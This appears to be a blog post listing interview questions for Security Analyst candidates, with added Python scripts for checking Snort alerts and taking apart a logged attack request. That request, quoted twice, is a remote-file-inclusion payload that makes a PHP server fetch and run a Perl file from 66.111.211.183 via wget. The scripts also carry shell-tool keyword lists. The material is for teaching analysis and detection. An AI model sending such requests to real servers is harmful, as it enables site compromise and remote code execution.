Conducted an interview session this morning for a few Security Analyst posts to be stationed at the client's site. For today's session there were 4 candidates, who I hoped at first would be better than the last batch I interviewed quite some time ago. These candidates were the ones who passed the assessment test they sat last Friday morning. For those who want to know what kind of questions would be asked if I were the interviewer, below are those questions.

P/S: You'll discover that most of the questions are not too detailed, because mainly I'm looking for the ones who have sound security fundamentals. (By the way, most of the candidates will only go blank / gape / grin sheepishly when asked a slightly more detailed question such as how an IPS differs from a conventional firewall. I know this is not a detailed question.)
1) I would ask you to introduce yourself (education background, family, skills, etc.)

- I would like to point out that most of the candidates tend to concentrate on their education background, family background, hobbies, etc., but so far only a few mentioned their experience, knowledge, skills, interests, goals and purpose in applying for the job. So next time please remember that the interviewer wants to know how you express yourself (for communication evaluation), your objectives, and your vision and mission in joining the company, rather than what your favourite meals, favourite colours, hobbies and other unrelated matters are.

2) To test your basic security knowledge, the question would be one of:

a) What is your opinion regarding network security? or

b) What do you understand about ICT Security as a whole? or

c) In order to keep risk at an acceptable level, what do you think would be good security process practice?

3) What do you know about the Security Analyst role? (This question is regarding the post.)

- I do expect all the candidates to at least do some research on the internet. It sounds ridiculous if you don't even know about the job you are applying for. Ever heard of Google?

4) What do you know about IDS? (Because we are using an IDS.)

a) The difference between IDS and IPS

b) Experience/hands-on training with any IDS

c) Understanding of how the IDS works

d) Able to read/interpret/understand the signatures/rules. *Bonus

e) IDS deployment. *Bonus as well :)

5) Only 2 questions. (I made some modifications, and if you did notice the odd

[**] [1:2001717:0] ATTACK-RESPONSES id check returned userid [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841
10.14.3.3:53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0x10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0x99984D5A Win: 0x5A8 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499

[**] [1:2001717:0] ATTACK-RESPONSES id check returned root [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841
10.14.3.3.53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0x10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0x99984D5A Win: 0x5B4 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499


Info on 23.143.3.3


HTTP/1.1 200 OK
Date: Sat, 17 June 2006 19:34:48 GMT
Server: Apache/2.2.0 (Unix)
Last-Modified: Sun, 09 Jul 2006 17:43:47 GMT
ETag: "20003-39aa-41829a3c27ac0"
Accept-Ranges: bytes
Content-Length: 14762
Cache-Control: max-age=86400
Expires: Sun, 16 Jul 2006 19:34:48 GMT
Content-Type: text/htm

What do you think about those alerts above?
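As an added example that is not part of the original post: a small Python script that parses alerts in Snort's full-alert format and runs the sanity checks an analyst should apply before trusting what an alert says. Its input is a constructed sample made from the two alerts quoted above (laid out as printed, including the second alert's '.' before the source port) plus one made-up alert showing what a self-consistent hit would look like. The thresholds it uses (443 treated as a TLS port, ports below 1024 treated as the server side) are assumptions for the example, not anything the post states.

```python
"""Parse Snort full-alert output and sanity-check it before acting on it."""
import re

# Constructed sample: the two alerts quoted in the post, laid out as printed
# there (the second keeps its '.' before the source port), followed by one
# made-up alert showing what a self-consistent 'id' response hit looks like.
SAMPLE_ALERTS = """\
[**] [1:2001717:0] ATTACK-RESPONSES id check returned userid [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841
10.14.3.3:53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0x10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0x99984D5A Win: 0x5A8 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499

[**] [1:2001717:0] ATTACK-RESPONSES id check returned root [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841
10.14.3.3.53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0x10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0x99984D5A Win: 0x5B4 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499
"""
CLEAN_ALERT = """\
[**] [1:2001717:0] ATTACK-RESPONSES id check returned root [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:21.102233 23.143.3.3:80 -> 10.14.3.3:53474
TCP TTL:54 TOS:0x0 ID:18234 IpLen:20 DgmLen:338 DF
***AP*** Seq: 0x99984D5A  Ack: 0xCE0BDC22  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 42767499 62210806
"""

HEADER_RE = re.compile(r"\[\*\*\]\s*\[(\d+):(\d+):(\d+)\]\s*(.*?)\s*\[\*\*\]")
TS_RE = re.compile(r"\d\d/\d\d-\d\d:\d\d:\d\d\.\d{6}")
ADDR_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})([:.])(\d{1,5})\s*->\s*"
                     r"(\d{1,3}(?:\.\d{1,3}){3})[:.](\d{1,5})")
IP_RE = re.compile(r"(TCP|UDP)\s+TTL:(\d+)\s+TOS:0x[0-9A-Fa-f]+\s+ID:(\d+)"
                   r"\s+IpLen:(\d+)\s+DgmLen:(\d+)")
TCP_RE = re.compile(r"([*A-Z12]{8})\s+Seq:\s*0x([0-9A-Fa-f]+)\s+Ack:\s*0x([0-9A-Fa-f]+)"
                    r"\s+Win:\s*0x([0-9A-Fa-f]+)\s+TcpLen:\s*(\d+)")
# ATTACK-RESPONSES rules look for command output coming back from the server.
RESPONSE_RE = re.compile(r"ATTACK[-_]RESPONSES?|id check returned", re.I)


def parse_alert(block):
    """Turn one full-format alert (whatever its line layout) into a dict."""
    m = [r.search(block) for r in (HEADER_RE, TS_RE, ADDR_RE, IP_RE, TCP_RE)]
    if not all(m):
        raise ValueError("unrecognised alert block:\n" + block)
    h, t, a, i, p = m
    return {"gid": int(h[1]), "sid": int(h[2]), "rev": int(h[3]), "msg": h[4], "ts": t[0],
            "src": a[1], "sep": a[2], "sport": int(a[3]), "dst": a[4], "dport": int(a[5]),
            "ttl": int(i[2]), "ipid": int(i[3]), "iplen": int(i[4]), "dgmlen": int(i[5]),
            "flags": p[1], "seq": int(p[2], 16), "ack": int(p[3], 16),
            "win": int(p[4], 16), "tcplen": int(p[5]),
            # TCP payload actually carried: datagram length minus both headers
            "payload": int(i[5]) - int(i[4]) - int(p[5])}


def parse_alerts(text):
    """Split a full-alert file on blank lines and parse each block."""
    return [parse_alert(b) for b in re.split(r"\n\s*\n", text.strip()) if b.strip()]


def analyse(alerts):
    """Return (alert_no, code, explanation) for everything that does not add up."""
    out = []
    for n, a in enumerate(alerts, 1):
        if a["payload"] <= 0:
            out.append((n, "no-payload", f"alert {n}: DgmLen {a['dgmlen']} - IpLen {a['iplen']}"
                        f" - TcpLen {a['tcplen']} = {a['payload']} payload bytes, so no content"
                        f" rule can have matched this {a['flags']} segment"))
        if 443 in (a["sport"], a["dport"]):
            out.append((n, "tls-port", f"alert {n}: port 443 is normally TLS; a plaintext"
                        " match there needs decryption in front of the sensor"))
        if RESPONSE_RE.search(a["msg"]) and a["dport"] < 1024 <= a["sport"]:
            out.append((n, "wrong-direction", f"alert {n}: server-response signature on a"
                        f" client -> server packet ({a['sport']} -> {a['dport']})"))
        if a["sep"] != ":":
            out.append((n, "addr-format", f"alert {n}: '{a['src']}{a['sep']}{a['sport']}'"
                        " is not how Snort prints ip:port"))
    by_rule, seen = {}, {}
    for n, a in enumerate(alerts, 1):
        by_rule.setdefault((a["gid"], a["sid"], a["rev"]), set()).add(a["msg"])
        pkt = (a["ts"], a["src"], a["sport"], a["dst"], a["dport"], a["ipid"], a["seq"], a["ack"])
        if pkt in seen:
            out.append((n, "duplicate-packet", f"alerts {seen[pkt]} and {n} describe the same"
                        f" packet (timestamp, IP ID {a['ipid']}, Seq, Ack) with windows"
                        f" {alerts[seen[pkt] - 1]['win']:#x} and {a['win']:#x}"))
        seen.setdefault(pkt, n)
    for (gid, sid, rev), msgs in by_rule.items():
        if len(msgs) > 1:
            out.append((None, "sid-msg-mismatch", f"rule {gid}:{sid}:{rev} carries {len(msgs)}"
                        f" different msg strings {sorted(msgs)}; one rule has one msg"))
    return out


if __name__ == "__main__":
    for finding in analyse(parse_alerts(SAMPLE_ALERTS)):
        print(finding[2])
    print("clean sample:", analyse(parse_alerts(CLEAN_ALERT)))
```

Run as a script it prints nine findings for the quoted pair and none for the made-up alert. The arithmetic it reports (DgmLen minus IpLen minus TcpLen) is the quickest check of all: it tells you whether the packet could have carried anything for a content rule to match.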

and the other question would be:


/2006/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.111.211.183/~secilmis/memberz/cmd.txt?&cmd=cd%20/tmp;wget%20http://66.111.211.183/~secilmis/memberz/travma;perl%20travma;rm%20-rf%20travma? HTTP/1.0

What is the attacker's intention?


What does the attacker need to know about the system in order to make sure his attack succeeds?
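As an added example that is not part of the original post: a Python script that decodes a request like the one quoted above and lists the indicators worth pulling out of it, that is, which parameter carries a remote URL (the remote file inclusion itself), which parameters are named after PHP superglobals, what the command chain does and which hosts it contacts, together with the conditions that would have to hold on the target for such a request to work. The request line is a constructed sample built from the quoted request; the post does not show the HTTP method, so GET is assumed. The lists of superglobal names and shell words used for detection are assumptions for the example, not properties of the application being attacked.

```python
"""Pull the indicators out of a suspected remote-file-inclusion (RFI) request."""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: the request quoted in the post, joined into one request
# line. The post does not show the method, so GET is assumed here.
SAMPLE_REQUEST = (
    "GET /2006/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1"
    "&GLOBALS=&mosConfig_absolute_path="
    "http://66.111.211.183/~secilmis/memberz/cmd.txt?"
    "&cmd=cd%20/tmp;wget%20http://66.111.211.183/~secilmis/memberz/travma;"
    "perl%20travma;rm%20-rf%20travma? HTTP/1.0"
)

URL_RE = re.compile(r"(?:https?|ftp)://[^\s;|'\"<>]+", re.I)
# Variables PHP fills in itself. A request parameter with one of these names
# only has an effect when register_globals (or an emulation of it) is on.
SUPERGLOBALS = {"GLOBALS", "_REQUEST", "_GET", "_POST", "_COOKIE",
                "_SERVER", "_FILES", "_ENV", "_SESSION"}
# First words that mark a parameter value as a shell command chain, not data.
SHELL_WORDS = {"cd", "wget", "curl", "fetch", "lynx", "perl", "python",
               "sh", "bash", "chmod", "rm", "nohup"}


def split_query(target):
    """Split 'path?query' into the path and an ordered list of (key, value).

    Done by hand instead of urllib.parse.parse_qs so the ';' inside cmd= is
    kept (older parse_qs versions split on ';' too) and blank values such as
    GLOBALS= survive.
    """
    path, _, query = target.partition("?")
    params = []
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.append((unquote(key), unquote(value)))
    return path, params


def command_chain(value):
    """Return the ';'-separated commands in value, or [] if it is not a chain."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    if parts and all(p.split()[0] in SHELL_WORDS for p in parts):
        return parts
    return []


def preconditions(report):
    """What must hold on the target for the observed request to succeed."""
    needs = []
    if report["rfi"]:
        needs.append("the script include()s the parameter before setting it, with "
                     "allow_url_fopen (and on PHP >= 5.2 allow_url_include) enabled")
    if report["globals_abuse"]:
        needs.append("register_globals is on, or the application's emulation of it "
                     "can be overridden from the request")
    if report["commands"]:
        tools = sorted({c.split()[0] for c in report["commands"]} - {"cd"})
        needs.append(f"the web server account can run {', '.join(tools)} "
                     "(exec functions not disabled, safe_mode off, /tmp writable)")
    if report["hosts"]:
        needs.append("outbound HTTP from the web server to "
                     + ", ".join(sorted(report["hosts"])) + " is allowed")
    return needs


def analyse_request(request_line):
    """Summarise the RFI indicators in one HTTP request line."""
    method, target, _version = request_line.split(" ", 2)
    path, params = split_query(target)
    report = {"method": method, "path": path, "rfi": [], "globals_abuse": [],
              "commands": [], "hosts": set(), "notes": []}
    for key, value in params:
        if key.split("[", 1)[0] in SUPERGLOBALS:
            report["globals_abuse"].append(key)
        if URL_RE.match(value):
            report["rfi"].append((key, value))
            if value.endswith("?"):
                report["notes"].append(
                    f"{key}: include URL ends in '?', so whatever the script appends "
                    "to the path becomes a query string and the attacker's file is "
                    "fetched unchanged")
        report["commands"] += command_chain(value)
        for url in URL_RE.findall(value):
            report["hosts"].add(urlsplit(url).hostname)
    report["preconditions"] = preconditions(report)
    return report


if __name__ == "__main__":
    for field, value in analyse_request(SAMPLE_REQUEST).items():
        print(f"{field}: {value}")
```

The hosts it collects are the indicators to block and hunt for in proxy and firewall logs; the preconditions list doubles as the checklist for confirming whether the server was actually exploitable (PHP settings, installed tools, egress filtering) rather than just probed.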

So that's it. Hehehe. Anyway, those are the basic questions. From time to time, based on your answers, perhaps we can venture a little further. Any comments on these questions? Perhaps you can suggest more constructive questions as well.